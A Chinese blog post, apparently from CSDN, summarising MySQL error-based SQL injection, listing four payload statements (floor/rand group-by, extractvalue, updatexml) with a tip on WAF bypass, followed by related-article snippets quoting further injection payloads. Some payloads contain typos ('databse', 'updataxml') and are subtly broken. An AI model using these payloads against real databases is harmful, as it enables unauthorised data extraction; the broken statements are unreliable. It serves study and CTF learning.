sql报错注入总结【积累中】

最新推荐文章于 2024-07-23 21:39:06 发布
最新推荐文章于 2024-07-23 21:39:06 发布
阅读量3.5k 收藏 5
点赞数
文章标签: sql 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/78160941
版权

==========================第一次总结尝试==============================

首先放一下测试的表

第一条报错注入语句:

 

select password from sql_test where username = 'admin' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

 

concat内为具体报错语句

 

 

第二条报错注入语句:

 select * from sql_test where id = 1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1;

 

version处替换成报错语句

 

第三条报错语句

 

 select * from sql_test where id = 1 and extractvalue(1,concat(0x5c,databse()));


database处换成报错语句

 

 

 

第四条报错语句

 select * from sql_test where id = 1 and updataxml(1,concat(0x5c,databse()));

 

database处换成报错语句

 

 

 

顺便提一句updataxml和extractvalue可以用于注入的时候进行绕过waf,用法找sql文档看一下吧

 

报错语句替换,最核心的还是concat()函数

 

 

 

 

 

 

 

 

Sp4rkW
关注
专栏目录
SQL注入学习资料总结
墨痕诉清风的博客
05-13 729
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的。
Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 2998
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
sql注入——sqlserver报错注入
cxrpty的博客
02-12 6000
该注入的条件是必须有报错信息 用到函数convert(int,(select top 1 db_name() )),其含义是将第二个参数的值转换成第一个参数的int类型 一、打开文件,如下图所示,有报错信息: 二、查看数据库 输入:http://192.168.1.106/1.php?id=1 and 1=convert(int,(select top 1 db_name()));这里...
sql报错
山有木兮木有枝
09-12 188
ORDER BY clause is not in GROUP BY clause and contains nonaggregated column 'information_schema.PROFILING.SEQ' which is not functionally dependent on columns in GROUP BY clause; this is incompatible w...
几种常见的报错注入类型详解
最新发布
m0_74312676的博客
07-23 820
报错注入是一种通过引起数据库报错并从错误信息提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
SQL常见的6个报错
张俊红的个人博客
12-04 6704
本篇讲讲SQL常见的一些报错,内容节选自《对比Excel,轻松学习SQL数据分析》一书。1 表名错误如果数据库没有某张表,或者你在写代码的时候把表名写错了,都会导致程序找不到这张表,...
SQL注入---报错注入
zhoutong2323的博客
04-04 1026
SQL注入报错攻击,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
SQL 常见报错汇总
ZH_SIMON的博客
12-08 2464
SQL 常见报错汇总 22007:日期时间值的字符串表示法的语法不正确 解决方案: DATA类型不能填空,例如‘’。可以用null或者对应日期 42704:‘表名’是一个未定义的名称 解决方案: 1.平时查表时遇到的话,就是需要加个对应的前缀。 2.存储过程遇到,是要查对应的表名,不是存储过程名,是tables and views下的表名 42723:例程‘存储过程名’的定义提供的特征符与另外某个例程的特征符相匹配 解决方案: 说明这个存储过程已经有了,在开头的create后面加个替换关键词:or
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 414
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
简单的sql注入1-3详解及相关阅读(实验吧)
zhy的博客
12-29 2249
题外话:更多关于信息安全、网络技术方面的东西,可以参考我的博客,也许你能找到你想看的? https://www.xiaozzz.xyz/ 1 简单的Sql注入 类型:sql注入 题目链接: http://www.shiyanbar.com/ctf/1875 解题过程: 打开页面看到一个输入框和提交,先尝试输入一些简单的东西,发现输入1 2 3都是有结果的,输入4之后没有结果。 按照...
通过使用SQLMap自动化工具进行SQL注入测试
SQL注入攻击的原理是利用应用程序对用户输入数据的过滤不严谨,未对用户输入进行充分验证和转义处理,导致攻击者可以通过在输入插入特殊的SQL代码来绕过应用程序的安全控制并执行恶意的数据库操作。常见的SQL注入...
SQL注入-报错注入
热门推荐
LJH1999ZN的博客
02-09 1万+
sql注入之报错注入的演示与介绍
SQL报错注入的12个函数及sql注入语句
weixin_30852451的博客
07-09 1274
转来的 侵删 1、通过floor报错,注入语句如下: andselect1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a); 2、通过ExtractValue报错,注入语句如下: andextractva...
sql注入报错注入-ctf
时光凉春衫薄的博客
08-11 235
找数据库 ?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23 获取表名 ?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='secur
mysql错误回显注入_基于错误回显的sql注入整理
weixin_36031047的博客
01-19 309
由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P0x00 关于错误回显用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。0x01 用于错误回显...
sql】报错信息
Yaooo24的博客
05-30 2373
报错信息:which is not functionally dependent on columns in GROUP BY clause;找到自己的mysql安装路径(如果不记得可在计算机管理里面查到,右键选择属性)在对连接表进行select查找时出现以上报错信息。原因在于所查找的内容随其他查找内容就可以确定了?添加如下代码在【mysqld】。打开【my.ini】文件。
基于错误回显的sql注入整理
ailugong8410的博客
06-08 438
  由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P   0x00 关于错误回显     用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰...
SQL 报错整理
greatwind的博客
09-08 533
SQL报错整理1. error: 不是单组分组函数 1. error: 不是单组分组函数 此报错,一般是由于语句逻辑上不够严谨导致的,解决办法:减少语句嵌套,避免逻辑错误。
SQL报错注入的0x7e
04-05
0x7e是ASCII码表的波浪符号(~),在SQL注入攻击,它通常用于绕过一些简单的过滤器和安全措施。 具体来说,当我们在注入点输入一些特殊字符(如单引号、双引号、斜杠等),有些过滤器会将它们替换成其他字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值